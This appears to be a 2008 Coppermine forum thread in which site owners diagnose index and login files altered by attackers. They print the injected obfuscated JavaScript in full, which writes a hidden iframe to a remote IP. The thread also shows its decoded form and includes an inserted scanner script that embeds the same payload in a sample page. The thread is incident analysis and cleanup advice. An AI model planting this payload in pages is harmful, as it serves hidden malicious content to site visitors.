1.4.18 (Stable) SQL Injection issue. (I think)

Started by adam1942, June 11, 2008, 11:45:36 PM

adam1942

Folks,

I installed version 1.4.14 of Coppermine through Fantastico, then upgraded straight away (within 5 minutes) of using 1.4.14. The gallery has been known to the public for about 1 day / 1 and a half days and I've already had an SQL injection (I think) which is loading crap from advancedxpdefender.xxxxx. Has anyone else had this? I cannot find how to remove it as I cannot find anything in the SQL database linking to advancedxpdefender. Are there any specific files I should be checking on the FTP?

ADam.

adam1942

Er, that's supposed to say I upgraded to 1.4.18, sorry!

Nibbler

Check for any files modified since you made the update. If you just installed then you can just upload clean copies of all the files. What makes you think it's SQL injection? Do you have a log file that indicates this?

adam1942

Nope, but no one else has access to the FTP to access any file.. all perms should be set right. I had an SQL injection before on a forum and it loaded exactly the same way, which is what's making me think it's a SQL injection. I will check for files that are modded and get back to you.

adam1942

OK fella, found out that index.php and login.php had been edited today. The worrying thing is that NO one has access to the FTP and the password is numbers/letters and characters. Any ideas?

adam1942

I've also taken a backup of them if you wish to see the infected/modified file.

adam1942

Just found out every index.php/index.html/login.php has been changed on my server. This is webhosting so I think maybe the whole box was attacked! Oops :(

wurst

I was looking for this curious incident and so I found this page. I think it has nothing to do especially with Coppermine. I design a few pages on different hosters and I have exactly this situation: a lot of (not every) index.php/html/htm files have this javascript tag:

<script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>


My suspicion is that I had installed a worm or eventually an injection software on my local PC that read all my FTP logins and wrote this javascript tag to all index files!
I saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (Russia) was loading. When I left the page or closed the window, a popup appeared with a warning that my PC isn't protected and I should go to advancedxp, no I don't write this f...... domain name anymore.

Now I reinstalled my OS and it seems to work as well...

SaWey

Yes, this code, when evaluated, looks like this:

<SCRIPT>
window.status='Done';
document.write('<iframe name=[random_nr] src=\'http://77.221.X.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93  style=\'display: none\'></iframe>')
</SCRIPT>
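
The obfuscation in wurst's snippet and the decoded form SaWey shows are the same thing: hex pairs turned back into characters. As an added example, not code from the thread or from Coppermine, the script below does that decoding statically (no eval, no browser) and scans a page's contents for the same document.write pattern, reporting the iframe host and whether it is hidden, so an admin can check index/login files without loading them. The SAMPLE_INDEX_HTML is a constructed file wrapping the hex literal quoted above; O10H/H48 are shortened stand-ins for the original helper names.

```javascript
// Added example: static deobfuscation + scan for the injected block seen in
// the thread. Decoding is plain hex-pair -> character, exactly what the
// O10H.../H48... helpers in the infected files do, so no code is executed.

// Hex argument to document.write(...) copied from wurst's post above.
const PAYLOAD_HEX =
  '3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E';

// Decode a string of 2-character hex pairs; refuse anything that is not clean hex.
function decodeHexPairs(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error('not a clean hex-pair string');
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Matches document.write(<decoder>('<long hex literal>')) as found in the infected files.
const INJECT_RE = /document\.write\(\s*\w+\(\s*'([0-9a-fA-F]{40,})'\s*\)\s*\)/g;

// One record per injected block: decoded HTML, iframe host, and whether it is hidden.
function findInjectedScripts(fileText) {
  const hits = [];
  for (const m of fileText.matchAll(INJECT_RE)) {
    const decoded = decodeHexPairs(m[1]);
    const src = decoded.match(/src=\\?'?(https?:\/\/[^'\\\s]+)/i);
    hits.push({ decoded, iframeHost: src ? new URL(src[1]).hostname : null, hidden: /display:\s*none/i.test(decoded) });
  }
  return hits;
}

// Constructed sample: a trimmed index.html carrying the block quoted in the thread.
const SAMPLE_INDEX_HTML = `<html><body><h1>My Gallery</h1>
<script>
<!--
var d=document,kol=561;
function O10H(a){ return parseInt(a,16);}function H48(s){ var o='';for(var i=0;i<s.length;i+=2){ o+=String.fromCharCode(O10H(s.substr(i,2)));}return o;} document.write(H48('${PAYLOAD_HEX}'));
//-->
</script>
</body></html>`;

for (const hit of findInjectedScripts(SAMPLE_INDEX_HTML)) {
  console.log(`hidden iframe: ${hit.hidden}  host: ${hit.iframeHost}\n${hit.decoded}`);
}
```

To check a real site, read each index.php/index.html/login.php from a clean backup copy and pass its text to findInjectedScripts; any hit is a file to restore and a host to block.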

Joachim Müller

Not a case of SQL injection though, as far as I can tell. Seems like you have fallen victim to a similar hack as the one discussed in http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
A copycat may have changed the workload of the hack, but probably is using the same attack pattern. Therefore, do as suggested in http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

wurst

I recommend changing ALL your passwords from a clean machine. I changed all but one FTP account, and this one continues to be attacked with said javascript code. So the attacks don't come from the one machine but from outside. My hoster said that FTP actions came from 77.221.....